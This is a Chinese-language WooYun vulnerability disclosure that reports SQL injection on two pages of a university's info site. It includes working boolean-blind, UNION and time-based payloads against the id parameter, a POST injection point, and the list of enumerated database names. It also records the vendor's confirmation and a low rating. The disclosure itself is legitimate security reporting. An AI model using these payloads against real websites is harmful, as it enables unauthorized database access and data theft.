漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0149394
漏洞标题:西南财经大学 sql注入漏洞
相关厂商:西南财经大学
漏洞作者: 人丑嘴不甜
提交时间:2015-10-26 10:55
修复时间:2015-12-10 11:02
公开时间:2015-12-10 11:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开
简要描述:
西南财经大学 sql注入漏洞 差两个rank 原谅我...........
详细说明:
注入点1
http://info.swufe.edu.cn/vlc/?id=1'%22&wall=1
id注入
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-1392' OR (8224=8224)#&wall=1
Type: UNION query
Title: MySQL UNION query (random number) - 7 columns
Payload: id=-5979' UNION ALL SELECT 7629,7629,CONCAT(0x7178617371,0x674f6a676a5a4a417347,0x7179696171),7629,7629,7629,7629#&wall=1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: id=-3429' OR 3258=SLEEP(5) AND 'ZFYM'='ZFYM&wall=1
---
注入点2
info.swufe.edu.cn/netinfo/everyday/index.asp
post注入
button=%cc%e1%bd%bb&begintime=1&endtime=1&uid= 里面的uid
available databases [16]:
[*] aclm_db
[*] config_db
[*] ead
[*] etl
[*] icc_db
[*] invent_db
[*] master
[*] model
[*] monitor_db
[*] msdb
[*] perf_db
[*] report_db
[*] reportplat_db
[*] syslog_db
[*] tempdb
[*] vlanm_db
漏洞证明:
修复方案:
谢谢 您的rank
版权声明:转载请注明来源 人丑嘴不甜@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2015-10-26 11:01
厂商回复:
谢谢!
最新状态:
暂无